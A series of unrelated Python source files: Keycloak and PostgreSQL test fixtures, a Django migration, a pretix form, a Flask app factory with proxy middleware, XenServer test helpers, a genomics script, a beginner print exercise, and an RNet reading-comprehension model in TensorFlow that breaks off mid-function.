KeycloakAdmin(server_url=self._ti_config['keycloak'].get('admin_url'), username=self._ti_config['keycloak'].get('admin_user'), password=self._ti_config['keycloak'].get('admin_password'), realm_name='master') except psycopg2.OperationalError: raise TIException(skip=True, msg='Failed to obtain an administrative connection to PG') except KeycloakOperationError: raise TIException(skip=True, msg='Failed to obtain an administrative connection to KeyCloak') @contextlib.contextmanager def app_dsn(self, role: str = 'test', password: str = 'test', schema: str = 'test', drop_finally: bool = False): try: cur = self._pg_admin.cursor() cur.execute("SELECT COUNT(rolname) FROM pg_roles WHERE rolname = %(role_name)s;", {'role_name': role}) role_count = cur.fetchone() if role_count[0] == 0: cur.execute( psycopg2.sql.SQL('CREATE ROLE {} ENCRYPTED PASSWORD %(password)s LOGIN').format( psycopg2.sql.Identifier(role)), {'password': password}) cur.execute(psycopg2.sql.SQL('CREATE SCHEMA IF NOT EXISTS {} AUTHORIZATION {}').format( psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(role))) cur.execute(psycopg2.sql.SQL('ALTER ROLE {} SET search_path TO {}').format( psycopg2.sql.Identifier(role), psycopg2.sql.Identifier(schema))) self._pg_admin.commit() cur.close() dsn_info = psycopg2.extensions.ConnectionInfo = psycopg2.extensions.parse_dsn(self._ti_config['pg']. get('admin_dsn')) app_dsn = f"postgresql://{role}:{password}@{dsn_info['host']}:{dsn_info['port']}/{dsn_info['dbname']}" yield app_dsn except psycopg2.Error: raise TIException(msg=f'Failed to create role {role} on schema {schema}') finally: if drop_finally: LOGGER.info(f'Dropping schema {schema} and associated role {role}') cur = self._pg_admin.cursor() cur.execute( psycopg2.sql.SQL('DROP SCHEMA {} CASCADE').format(psycopg2.sql.Identifier(schema))) cur.execute( psycopg2.sql.SQL('DROP ROLE {}').format(psycopg2.sql.Identifier(role))) self._pg_admin.commit() cur.close() @contextlib.contextmanager def app_auth(self, tmpdir, client_id: str = 'test-client', ti_id: str = 'ti-client', scopes: List[str] = None, scope: str = 'test-scope', redirect_uris: List = None, drop_finally: bool = False): try: if scopes is None: scopes = [] for scope in scopes: if not self._keycloak_admin.get_client_scope(scope): self._keycloak_admin.create_client_scope({ 'id': scope, 'name': scope, 'description': f'Test {scope}', 'protocol': 'openid-connect' }) if not self._keycloak_admin.get_client_id(client_id): self._keycloak_admin.create_client({ 'id': client_id, 'name': client_id, 'publicClient': False, 'optionalClientScopes': scopes }) client_secret = self._keycloak_admin.generate_client_secrets(client_id) if not self._keycloak_admin.get_client_id(ti_id): self._keycloak_admin.create_client({ 'id': ti_id, 'name': ti_id, 'publicClient': False, 'redirectUris': ['http://localhost'], 'directAccessGrantsEnabled': True, 'optionalClientScopes': scopes }) ted_secret = self._keycloak_admin.generate_client_secrets(ti_id) keycloak = KeycloakOpenID(server_url=self._keycloak_admin.server_url, client_id=ti_id, client_secret_key=ted_secret['value'], realm_name='master', verify=True) discovery = keycloak.well_know() with open(f'{tmpdir}/client_secrets.json', 'w') as cs: json.dump({ 'web': { 'client_id': client_id, 'client_secret': client_secret['value'], 'auth_uri': discovery['authorization_endpoint'], 'token_uri': discovery['token_endpoint'], 'userinfo_uri': discovery['userinfo_endpoint'], 'token_introspection_uri': discovery['introspection_endpoint'], 'issuer': discovery['issuer'], 'redirect_uris': redirect_uris } }, cs) self._auth_info = { 'client_secrets_file': f'{tmpdir}/client_secrets.json', 'client_id': client_id, 'client_secret': client_secret['value'], 'ti_id': ti_id, 'ti_secret': ted_secret['value'] } yield self._auth_info except KeycloakOperationError as koe: LOGGER.exception(koe) finally: if drop_finally: LOGGER.info(f'Deleting client_id {client_id}') self._keycloak_admin.delete_client(client_id) LOGGER.info(f'Deleting client_id {ti_id}') self._keycloak_admin.delete_client(ti_id) LOGGER.info(f'Deleting scope {scope}') @contextlib.contextmanager def app(self, tmpdir, pg_role: str = 'mpaf', pg_password: str = 'mpaf', pg_schema: str = 'mpaf-test', drop_finally: bool = False): with self.app_dsn(role=pg_role, password=pg_password, schema=pg_schema, drop_finally=drop_finally) as dsn, \ self.app_auth(tmpdir, scopes=['mpaf-read', 'mpaf-write']) as auth: self._app = create_app({ 'TESTING': True, 'SECRET_KEY': secrets.token_hex(16), 'SQLALCHEMY_DATABASE_URI': dsn, 'OIDC_CLIENT_SECRETS': auth['client_secrets_file'] }) with self._app.app_context(): upgrade(directory=os.path.join(os.path.dirname(__file__), '..', 'migrations')) db.create_all() yield self._app @contextlib.contextmanager def app_client(self, app_dir): with self.app(app_dir) as app: yield app.test_client() @contextlib.contextmanager def user_token(self, user_id: str = 'test-user', user_password: str = 'test', scopes: List[str] = None, drop_finally: bool = False): try: self._keycloak_admin.create_user({ 'id': user_id, 'emailVerified': True, 'enabled': True, 'firstName': 'Test', 'lastName': 'User', 'username': user_id, 'credentials': [ {'value': user_password} ] }, exist_ok=True) keycloak = KeycloakOpenID(server_url=self._keycloak_admin.server_url, client_id=self._auth_info['ti_id'], client_secret_key=self._auth_info['ti_secret'], realm_name='master', verify=True) token = keycloak.token(user_id, user_password, scope=scopes) token['user_id'] = user_id yield token finally: if drop_finally: LOGGER.info(f'Deleting user {user_id}') self._keycloak_admin.delete_user(user_id) @pytest.fixture(scope='module', autouse=False, ) def no_test_infrastructure(): """ Class-wide fixture for when no test infrastructure is available Yields: An initialised NoTestInfrastructure object """ yield NoTestInfrastructure() @pytest.fixture(scope='class', autouse=False) def local_test_infrastructure(): """ Class-wide fixture to read the configuration of locally available test infrastructure from the `TI_CONFIG` environment variable. Yields: An initialised TI object """ if 'TI_CONFIG' not in os.environ: pytest.skip('There is TI_CONFIG environment variable configuring local infrastructure to test with') yield LocalTestInfrastructure(ti_config_path=pathlib.Path(os.path.expanduser(os.getenv('TI_CONFIG'))))
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('exchange_portal', '0002_auto_20170124_1858'), ] operations = [ migrations.AddField( model_name='school', name='exhange_with_liu', field=models.BooleanField(default=False), ), migrations.AddField( model_name='school', name='freemover', field=models.BooleanField(default=False), ), ]
from django import forms from django.utils.translation import ugettext_lazy as _ from pretix.base.forms import SettingsForm class PublicRegistrationsForm(SettingsForm): public_registrations_items = forms.MultipleChoiceField( widget=forms.CheckboxSelectMultiple( attrs={'class': 'scrolling-multiple-choice'} ), label=_('Show public registrations for'), required=True, choices=[], ) public_registrations_questions = forms.MultipleChoiceField( widget=forms.CheckboxSelectMultiple( attrs={'class': 'scrolling-multiple-choice'} ), label=_('Publicly show answers for'), required=True, choices=[], ) public_registrations_show_attendee_name = forms.BooleanField( label=_('Show attendee name'), required=False, ) public_registrations_show_item_name = forms.BooleanField( label=_('Show product name'), required=False, ) def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.fields['public_registrations_items'].choices = [ (i.pk, i.name) for i in self.obj.items.all() ] self.fields['public_registrations_questions'].choices = [ (q.pk, q.question) for q in self.obj.questions.all() ]
import os from flask import Flask class ReverseProxied(object): '''Wrap the application in this middleware and configure the front-end server to add these headers, to let you quietly bind this to a URL other than / and to an HTTP scheme that is different than what is used locally. In nginx: location /myprefix { proxy_pass http://192.168.0.1:5001; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Scheme $scheme; proxy_set_header X-Script-Name /myprefix; } :param app: the WSGI application ''' def __init__(self, app): self.app = app def __call__(self, environ, start_response): script_name = environ.get('HTTP_X_SCRIPT_NAME', '') if script_name: environ['SCRIPT_NAME'] = script_name path_info = environ['PATH_INFO'] if path_info.startswith(script_name): environ['PATH_INFO'] = path_info[len(script_name):] scheme = environ.get('HTTP_X_SCHEME', '') if scheme: environ['wsgi.url_scheme'] = scheme return self.app(environ, start_response) def create_app(test_config=None): app = Flask(__name__, instance_relative_config = True) app.wsgi_app = ReverseProxied(app.wsgi_app) app.config.from_mapping( SECRET_KEY='dev', DATABASE=os.path.join(app.instance_path, 'humidifier.sqlite') ) if test_config is None: app.config.from_pyfile('config.py', silent=True) else: app.config.from_mapping(test_config) try: os.makedirs(app.instance_path) except OSError: pass from . import db db.init_app(app) from . import panel app.register_blueprint(panel.bp) app.add_url_rule('/', endpoint='index') app.add_url_rule('/reloading', endpoint='reload') from . import auth app.register_blueprint(auth.bp) return app
""" Test helpers. """ from xenserver.models import ( AddressPool, Project, Template, XenServer, XenVM, Zone) from xenserver.tests.fake_xen_server import FakeXenServer HOST_MEM = 64*1024 HOST_CPUS = 16 VM_MEM = 2048 VM_CPUS = 1 VM_DISK = 10240 DEFAULT_SUBNET = "192.168.199.0/24" DEFAULT_GATEWAY = "192.168.199.1" class FakeXenHost(object): """ A wrapper around a single xen server and its associated API data. """ def __init__(self, hostname, xapi_version=None, mem=HOST_MEM, cpus=HOST_CPUS): xapi_version = (1, 2) if xapi_version is None else xapi_version self.hostname = hostname self.api = FakeXenServer() self.host_ref = self.api.add_host( xapi_version, mem=mem*1024*1024, cpu_info={'cpu_count': cpus}, ) self.api.add_pool(self.host_ref) self.net = {} self.pif = {} self.sr = {} def add_network(self, device, bridge, gateway=''): """ Add a network and its associated PIF. """ net = self.api.add_network(bridge=bridge) self.net[device] = net self.pif[device] = self.api.add_PIF(net, device, gateway=gateway) def add_sr(self, name, label, kind, vdis=()): """ Add an SR and optionally some VDIs. """ self.sr[name] = self.api.add_SR(label, kind) for vdi in vdis: self.api.add_VDI(self.sr[name], vdi) def get_info(self): return self.api.hosts[self.host_ref] def get_session(self): return self.api.getSession() def new_fake_host(hostname, xapi_version=None, isos=('installer.iso',)): """ Create a new fake host with default setup. """ host = FakeXenHost(hostname, xapi_version) host.add_network('eth0', 'xenbr0', gateway=DEFAULT_GATEWAY) host.add_network('eth1', 'xenbr1') host.add_sr('local', 'Local storage', 'lvm') host.add_sr('iso', 'ISOs', 'iso', isos) return host class XenServerHelper(object): def __init__(self): self.hosts = {} self.isos = ["installer.iso"] def new_host(self, hostname, xapi_version=None): """ Create a new host with default setup, including default db objects. """ host = new_fake_host(hostname, xapi_version, self.isos) self.add_existing_host(host) zone = self.db_zone("zone1") self.db_addresspool(DEFAULT_SUBNET, DEFAULT_GATEWAY, zone) xs = self.db_xenserver(hostname, zone) return (host, xs) def add_existing_host(self, host): """ Add an existing host helper to this collection. Primarily useful for nonstandard hosts. """ self.hosts[host.hostname] = host def new_vm(self, xs, name, template="default", **kw): """ Create a new vm with default setup, including default db objects. NOTE: This uses tasks.create_vm to wrangle all the xenserver objects. """ from xenserver import tasks template = self.db_template("default") vm = self.db_xenvm(xs, name, template, **kw) host, domain = name.split('.', 1) tasks.create_vm( vm, xs, template, host, domain, None, None, None, None) return vm def db_zone(self, name): return Zone.objects.get_or_create(name=name)[0] def db_addresspool(self, subnet, gateway, zone, version=4): return AddressPool.objects.get_or_create( subnet=subnet, gateway=gateway, zone=zone, version=version)[0] def get_db_xenserver(self, hostname): return XenServer.objects.get(hostname=hostname) def get_db_xenserver_dict(self, hostname): [xsdict] = XenServer.objects.filter(hostname=hostname).values() return xsdict def db_xenserver(self, hostname, zone, memory=HOST_MEM, mem_free=HOST_MEM, cores=HOST_CPUS, username="u", password="p"): return XenServer.objects.get_or_create( hostname=hostname, zone=zone, memory=memory, mem_free=mem_free, cores=cores, username=username, password=password)[0] def db_template(self, name, cores=VM_CPUS, memory=VM_MEM, diskspace=VM_DISK, iso="installer.iso"): return Template.objects.get_or_create( name=name, cores=cores, memory=memory, diskspace=diskspace, iso=iso)[0] def db_project(self, name): return Project.objects.get_or_create(name=name)[0] def get_db_xenvm(self, name): return XenVM.objects.get(name=name) def get_db_xenvm_dict(self, name): [vmdict] = XenVM.objects.filter(name=name).values() return vmdict def db_xenvm(self, xs, name, template, status="Running", **kw): params = { "sockets": template.cores, "memory": template.memory, } params.update(kw) return XenVM.objects.get_or_create( xenserver=xs, name=name, status=status, template=template, **params)[0] def get_session(self, hostname, username=None, password=None): return self.hosts[hostname].get_session()
# Apache License Version 2.0 # Copyright 2022 Xin Huang # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pandas as pd import pybedtools def get_tract(threshold_file, match_pct_files, output_prefix, diff): """ """ threshold_df = pd.read_csv(threshold_file, sep="\t") threshold_df = threshold_df[threshold_df['significant'] == True] cols = ['chrom', 'start', 'end'] if match_pct_files is None: pybedtools.BedTool.from_dataframe(threshold_df).sort().merge().moveto(output_prefix+'.bed') else: src1_df = pd.read_csv(match_pct_files[0], sep="\t") src2_df = pd.read_csv(match_pct_files[1], sep="\t") src1_sig_df = pd.merge(src1_df, threshold_df, on=['chrom', 'start', 'end', 'sample']) src2_sig_df = pd.merge(src2_df, threshold_df, on=['chrom', 'start', 'end', 'sample']) df = pd.merge(src1_sig_df, src2_sig_df, on=['chrom', 'start', 'end', 'sample']) src1_df = df[df['match_pct_x']-df['match_pct_y']>diff] src2_df = df[df['match_pct_x']-df['match_pct_y']<diff] pybedtools.BedTool.from_dataframe(src1_df).sort().merge().moveto(output_prefix+'.src1.bed') pybedtools.BedTool.from_dataframe(src2_df).sort().merge().moveto(output_prefix+'.src2.bed')
''' This is a multi-line comment Try making one at the end of the code file The IDE (this window) tries to help by adding the ending triple quotes automatically ''' #add code below this line print("Red") print("Orange") #the comment STARTS at the hash symbol #print("Yellow"); print("Green") print("Blue") print("Indigo") print("Violet") print("These are the colors of a rainbow!"); #add code above this line
from __future__ import absolute_import from __future__ import division import time import logging import os import sys import numpy as np import tensorflow as tf from tensorflow.python.ops import variable_scope as vs from tensorflow.python.ops import embedding_ops from evaluate import exact_match_score, f1_score from data_batcher import get_batch_generator from pretty_print import print_example from modules import RNNEncoder, SimpleSoftmaxLayer, BasicAttn, masked_softmax logging.basicConfig(level=logging.INFO) class RNet(object): def __init__(self, FLAGS, id2word, word2id, emb_matrix): print 'Initializing RNet Model' self.FLAGS = FLAGS self.id2word = id2word self.word2id = word2id #TODO: ADD CHARACTER to id, etc # Add all parts of the graph with tf.variable_scope("RNet", initializer=tf.contrib.layers.variance_scaling_initializer(factor=1.0, uniform=True)): self.add_placeholders() self.add_embedding_layer(emb_matrix) self.build_graph() self.add_loss() # Define trainable parameters, gradient, gradient norm, and clip by gradient norm params = tf.trainable_variables() gradients = tf.gradients(self.loss, params) self.gradient_norm = tf.global_norm(gradients) clipped_gradients, _ = tf.clip_by_global_norm(gradients, FLAGS.max_gradient_norm) self.param_norm = tf.global_norm(params) # Define optimizer and updates # (updates is what you need to fetch in session.run to do a gradient update) self.global_step = tf.Variable(0, name="global_step", trainable=False) opt = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate) # you can try other optimizers self.updates = opt.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step) # Define savers (for checkpointing) and summaries (for tensorboard) self.saver = tf.train.Saver(tf.global_variables(), max_to_keep=FLAGS.keep) self.bestmodel_saver = tf.train.Saver(tf.global_variables(), max_to_keep=1) self.summaries = tf.summary.merge_all() def add_placeholders(self): #Add placeholders to the graph. Placeholders are used to feed in inputs. # Add placeholders for inputs. # These are all batch-first: the None corresponds to batch_size and # allows you to run the same model with variable batch_size print("ADDING PLACEHOLERS") self.context_ids = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len]) self.context_mask = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len]) # Character ID's # TODO: add char max len #self.context_ids_c = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len, self.FLAGS.char_max_len]) #self.qn_ids_c = tf.placeholder(tf.int32, shape=[None, self.FLAGS.context_len, self.FLAGS.char_max_len]) self.qn_ids = tf.placeholder(tf.int32, shape=[None, self.FLAGS.question_len]) self.qn_mask = tf.placeholder(tf.int32, shape=[None, self.FLAGS.question_len]) self.ans_span = tf.placeholder(tf.int32, shape=[None, 2]) # Add a placeholder to feed in the keep probability (for dropout). # This is necessary so that we can instruct the model to use dropout when training, but not when testing self.keep_prob = tf.placeholder_with_default(1.0, shape=()) def add_embedding_layer(self, emb_matrix): """ Adds word embedding layer to the graph. Inputs: emb_matrix: shape (400002, embedding_size). The GloVe vectors, plus vectors for PAD and UNK. character_embeddings: shape (91, 300) Pretrained character-embeddings vectors, from https://github.com/minimaxir/char-embeddings/blob/master/output/char-embeddings.txt """ print "ADDING EMBEDDINGS" with vs.variable_scope("word_embeddings"): # Note: the embedding matrix is a tf.constant which means it's not a trainable parameter e_embedding_matrix = tf.constant(emb_matrix, dtype=tf.float32, name="e_emb_matrix") # shape (400002, embedding_size) # Get the word embeddings for the context and question, # using the placeholders self.context_ids and self.qn_ids self.e_context_embs = embedding_ops.embedding_lookup(e_embedding_matrix, self.context_ids) # shape (batch_size, context_len, embedding_size) self.e_qn_embs = embedding_ops.embedding_lookup(e_embedding_matrix, self.qn_ids) # shape (batch_size, question_len, embedding_size) """ with vs.variable_scope("char_embeddings_rnn"): c_embedding_matrix = tf.constant(character_embeddings, dtype=tf.float32, name="c_emb_matrix") self.c_context_embs = embedding_ops.embedding_lookup(c_embedding_matrix, self.context_ids) # shape (batch_size, context_len, max_char_len, embedding_size) self.c_qn_embs = embedding_ops.embedding_lookup(c_embedding_matrix, self.qn_ids) # shape (batch_size, question_len, max_char_len, embedding_size) context_list = tf.split(self.c_context_embs, self.FLAGS.context_len, axis=1) #### TO DO!!!! ADD FLAGS.e_emb_dim char_emb_fwd_cell = tf.contrib.rnn.GRUCell(self.FLAGS.e_emb_dim) char_emb_back_cell = tf.contrib.rnn.GRUCell(self.FLAGS.e_emb_dim) for t in range(self.FLAGS.context_len): # Do a BiRNN for Char to get a word_char encoding unstacked_context_t = tf.unstack(context_list[t], self.FLAGS.max_char_len, axis= 1) # split ONE WORD into a list of characters # REUSE THE VARIABLES if t > 0: tf.get_variable_scope().reuse_variables() # Not sure if I should use static or dynamic output, output_fwd, output_back = tf.contrib.rnn.static_bidirectional_rnn(char_emb_fwd_cell, char_emb_back_cell, unstacked_context_t, dtype='float32') context_fwd_max = tf.reduce_max(tf.stack(output_fwd, 0), 0) # get forward embedding by max pooling """ def build_graph(self): # ENCODING unstack_context = self.e_context_embs unstack_qn = self.e_qn_embs with tf.variable_scope('encoding') as scope: # Change to dynamic bidrectional rnn # WE CAN CHANGE THE GRU LATER WITH DROPOUT OUR # ADD ENCODE SIZE emb_fwd_cell = tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size) emb_back_cell = tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size) (c_fwd, c_back), _ = tf.nn.bidirectional_dynamic_rnn(emb_fwd_cell, emb_back_cell, unstack_context, tf.reduce_sum(self.context_mask, reduction_indices=1), dtype='float32') tf.get_variable_scope().reuse_variables() (qn_fwd, qn_back), _ = tf.nn.bidirectional_dynamic_rnn(emb_fwd_cell, emb_back_cell, unstack_qn, tf.reduce_sum(self.qn_mask, reduction_indices=1), dtype='float32') u_Q = tf.concat([qn_fwd, qn_back], 2) # [batch, q_len, 2 * hidden_size] because bidirectional stacks the forward and backward u_P = tf.concat([c_fwd, c_back], 2) # [batch, c_len, 2 * hidden_size] u_Q = tf.nn.dropout(u_Q, self.keep_prob) u_P = tf.nn.dropout(u_P, self.keep_prob) # GATED ATTENTION v_P = [] # All attention states across time # each element of v_P is an attention state for one time point with dim [batch_size, hidden_size] print "Gated Attention" with tf.variable_scope('Attention_gated') as scope: W_uQ = tf.get_variable('W_uQ', shape=(2 * self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_uP = tf.get_variable('W_uP', shape=(2 * self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_vP = tf.get_variable('W_vP', shape=(self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) v_QP = tf.get_variable('v_QP', shape=(self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_g_QP = tf.get_variable('W_g_QP', shape=(4 * self.FLAGS.hidden_size, 4 * self.FLAGS.hidden_size)) # TO DO: add drop prob in FLAGS QP_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size), self.keep_prob) zeros_dim = tf.stack([tf.shape(u_Q)[0], self.FLAGS.hidden_size]) QP_cell_hidden = tf.fill(zeros_dim, 0.0) for t in range(0, self.FLAGS.context_len): # TODO: MOVE THE VARIABLES TO SOMEWHERE ELSE APPROPRIATE WuQ_uQ = tf.tensordot(u_Q, W_uQ, axes = [[2], [0]]) # [batch, q_len, hidden_size] u_P_t = tf.reshape(u_P[:,t,:], (-1, 1, 2 * self.FLAGS.hidden_size)) # slice only 1 context word, [batch_size, 1, 2 * hidden_size] WuP_uP = tf.tensordot(u_P_t, W_uP, axes=[[2],[0]]) # [batch, 1, hidden_size] if t==0: s_t = tf.tensordot(tf.tanh(WuQ_uQ + WuP_uP), v_QP, axes=[[2],[0]]) # returns [batch, q_len] else: v_P_t = tf.reshape(v_P[t-1], (-1, 1, self.FLAGS.hidden_size)) # [batch_size, 1, hidden_size] WvP_vP = tf.tensordot(v_P_t, W_vP, axes=[[2],[0]]) # [batch_size, 1, hidden_size] s_t = tf.tensordot(tf.tanh(WuQ_uQ + WuP_uP + WvP_vP), v_QP, axes=[[2],[0]]) # returns [batch, q_len] #a_t = tf.nn.softmax(s_t, 1) _, a_t = masked_softmax(s_t, self.qn_mask, 1) # [batch, q_len] # [batch, q_len] , [batch,q_len,2*hidden_size] -> [batch, 2*hidden_size] c_t = tf.einsum('ij,ijk->ik', a_t, u_Q) #[batch,2*hidden_size] uPt_ct = tf.concat([tf.squeeze(u_P_t), c_t], 1) # [batch, 2 * 2 * hidden_size] g_t = tf.nn.sigmoid(tf.matmul(uPt_ct, W_g_QP)) # [batch, 2 * 2 * hidden_size] uPt_ct_star = tf.einsum('ij,ij->ij', g_t, uPt_ct) if t > 0: tf.get_variable_scope().reuse_variables() QP_output, QP_cell_hidden = QP_cell(uPt_ct_star, QP_cell_hidden) # both output and hidden [batch_size, hidden_size] v_P.append(QP_output) v_P = tf.stack(v_P, 1) # [batch, context_len, hidden_size] v_P = tf.nn.dropout(v_P, self.keep_prob) #SELF ATTN print "self attention" with tf.variable_scope("self_matching_attn") as scope: SM_input = [] W_v_P = tf.get_variable('W_v_P', shape=(self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) W_v_P_tot = tf.get_variable('W_v_P_tot', shape=(self.FLAGS.hidden_size, self.FLAGS.hidden_size), initializer=tf.contrib.layers.xavier_initializer()) v_SM = tf.get_variable('v_SM', shape=(self.FLAGS.hidden_size)) for t in range(0, self.FLAGS.context_len): v_j_P = tf.reshape(v_P[:,t,:], (-1, 1, self.FLAGS.hidden_size)) #Slice 1 v_P in time t [batch_size, 1, hidden_size] WvP_vj = tf.tensordot(v_j_P, W_v_P, axes=[[2],[0]]) # [batch, 1, hidden_size] WvPtot_vP = tf.tensordot(v_P, W_v_P_tot, axes=[[2], [0]]) # [batch, context_len, hidden_size] s_t = tf.tensordot(tf.tanh(WvP_vj + WvPtot_vP), v_SM, axes=[[2],[0]]) # [batch, context_len] #a_t = tf.nn.softmax(s_t, 1) _, a_t = masked_softmax(s_t, self.context_mask, 1) c_t = tf.einsum('ij,ijk->ik', a_t, v_P) #[batch, hidden_size] # add the gate vPt_ct = tf.concat([tf.squeeze(v_j_P), c_t], 1) #[batch, 2 * hidden_size] g_t = tf.nn.sigmoid(vPt_ct) vPt_ct_star = tf.einsum('ij,ij->ij', g_t, vPt_ct) # [batch, 2*hidden_size] SM_input.append(vPt_ct_star) # Someone here just stacked and then unstack, not sure why so I will just directly use SM_input SM_input= tf.stack(SM_input, 1) # [batch, context_len, 2 * hidden_size] SM_fwd_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size), self.keep_prob) SM_back_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(self.FLAGS.hidden_size), self.keep_prob) (h_P_fwd, h_P_back), SM_final = tf.nn.bidirectional_dynamic_rnn(SM_fwd_cell, SM_back_cell, SM_input, tf.reduce_sum(self.context_mask, reduction_indices=1), dtype=tf.float32) h_P = tf.concat([h_P_fwd, h_P_back], 2) h_P = tf.nn.dropout(h_P, self.keep_prob) #[batch, context_len, 2*hidden_size] # OUTPUT print "output" with tf.variable_scope("Output") as scope: W_ruQ = tf.get_variable('W_ruQ', shape=(2*self.FLAGS.hidden_size, 2*self.FLAGS.hidden_size)) V_rQ = tf.get_variable('V_rQ', shape=(self.FLAGS.question_len, 2*self.FLAGS.hidden_size)) W_vQ = tf.get_variable('W_vQ', shape=(2*self.FLAGS.hidden_size, 2*self.FLAGS.hidden_size)) v_rQ = tf.get_variable('v_rQ', shape=(2 * self.FLAGS.hidden_size)) WuQ_ujQ = tf.tensordot(u_Q, W_ruQ, [[2], [0]]) #[batch, q_len, 2 * hidden_size] WvQ_VrQ = tf.tensordot(V_rQ, W_vQ, [[1], [0]]) #[q_len, 2*hidden_size] s_t = tf.tensordot(tf.tanh(WuQ_ujQ + WvQ_VrQ), v_rQ, axes=[[2],[0]]) # The addition will broadcast # final shape: [batch, q_len] _, a_t = masked_softmax(s_t, self.qn_mask, 1) rQ = tf.einsum('ij,ijk->ik', a_t, u_Q) rQ = tf.nn.dropout(rQ, self.keep_prob) #[batch, 2*hidden_size] h_a = rQ # initial ans pointer p_t = [None]*2 W_hP = tf.get_variable('W_hP', shape=(2*self.FLAGS.hidden_size, self.FLAGS.hidden_size)) W_ha = tf.get_variable('W_ha', shape=(2*self.FLAGS.hidden_size, self.FLAGS.hidden_size)) v_ap = tf.get_variable('v_ap', shape=(self.FLAGS.hidden_size)) # answer pointer bias ans_cell = tf.contrib.rnn.DropoutWrapper(tf.contrib.rnn.GRUCell(2 * self.FLAGS.hidden_size), self.keep_prob) for t in range(0,2): # run thru RNN 2 times (cuz one start one end) WhP_hP = tf.tensordot(h_P, W_hP, [[2],[0]]) #[batch, context_len, hidden_size] Wha_ha = tf.reshape(tf.tensordot(h_a, W_ha, [[1],[0]]), (-1, 1, self.FLAGS.hidden_size)) #[batch, 1, encode] s_t = tf.tensordot(tf.tanh(WhP_hP + Wha_ha), v_ap, axes=[[2], [0]]) # [batch, context_len] #a_t = tf.nn.softmax(s_t, 1) _, a_t = masked_softmax(s_t, self.context_mask, 1) if t == 0: self.logits_start = a_t #[batch, context_alen] else: self.logits_end = a_t c_t = tf.einsum('ij,ijk->ik', a_t, h_P) #[batch, 2*encode] if t==0: h_a, _ = ans_cell(c_t, h_a) # h_a = [batch, 2*encode] print "complete" def add_loss(self): with vs.variable_scope("loss"): # Calculate loss for prediction of start position loss_start = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits_start, labels=self.ans_span[:, 0]) # loss_start has shape (batch_size) self.loss_start = tf.reduce_mean(loss_start) # scalar. avg across batch tf.summary.scalar('loss_start', self.loss_start) # log to tensorboard # Calculate loss for prediction of end position loss_end = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits_end, labels=self.ans_span[:, 1]) self.loss_end = tf.reduce_mean(loss_end) tf.summary.scalar('loss_end', self.loss_end) # Add the two losses self.loss = self.loss_start + self.loss_end tf.summary.scalar('loss', self.loss) def run_train_iter(self, session, batch, summary_writer): """ This performs a single training iteration (forward pass, loss computation, backprop, parameter update) Inputs: session: TensorFlow session batch: a Batch object summary_writer: for Tensorboard Returns: loss: The loss (averaged across the batch) for this batch. global_step: The current number of training iterations we've done param_norm: Global norm of the parameters gradient_norm: Global norm of the gradients """ # Match up our input data with the placeholders input_feed = {} input_feed[self.context_ids] = batch.context_ids input_feed[self.context_mask] = batch.context_mask input_feed[self.qn_ids] = batch.qn_ids input_feed[self.qn_mask] = batch.qn_mask input_feed[self.ans_span] = batch.ans_span input_feed[self.keep_prob] = 1.0 - self.FLAGS.dropout # apply dropout # output_feed contains the things we want to fetch. output_feed = [self.updates, self.summaries, self.loss, self.global_step, self.param_norm, self.gradient_norm] # Run the model [_, summaries, loss, global_step, param_norm, gradient_norm] = session.run(output_feed, input_feed) # All summaries in the graph are added to Tensorboard summary_writer.add_summary(summaries, global_step) return loss, global_step, param_norm, gradient_norm def get_loss(self, session, batch): input_feed = {} input_feed[self.context_ids] = batch.context_ids input_feed[self.context_mask] = batch.context_mask input_feed[self.qn_ids] = batch.qn_ids input_feed[self.qn_mask] = batch.qn_mask input_feed[self.ans_span] = batch.ans_span # note you don't supply keep_prob here, so it will default to 1 i.e. no dropout output_feed = [self.loss] [loss] = session.run(output_feed, input_feed) return loss def get_prob_dists(self, session, batch): input_feed = {} input_feed[self.context_ids] = batch.context_ids input_feed[self.context_mask] = batch.context_mask input_feed[self.qn_ids] = batch.qn_ids input_feed[self.qn_mask] = batch.qn_mask # note you don't supply keep_prob here, so it will default to 1 i.e. no dropout output_feed = [self.probdist_start, self.probdist_end] [probdist_start, probdist_end] = session.run(output_feed, input_feed) return probdist_start, probdist_end def get_start_end_pos(self, session, batch): # Get start_dist and end_dist, both shape (batch_size, context_len) start_dist, end_dist = self.get_prob_dists(session, batch) # Take argmax to get start_pos and end_post, both shape (batch_size) start_pos = np.argmax(start_dist, axis=1) end_pos = np.argmax(end_dist, axis=1) return start_pos, end_pos def get_dev_loss(self, session, dev_context_path, dev_qn_path, dev_ans_path): logging.info("Calculating dev loss...") tic = time.time() loss_per_batch, batch_lengths = [], [] # Iterate over dev set batches # Note: here we set 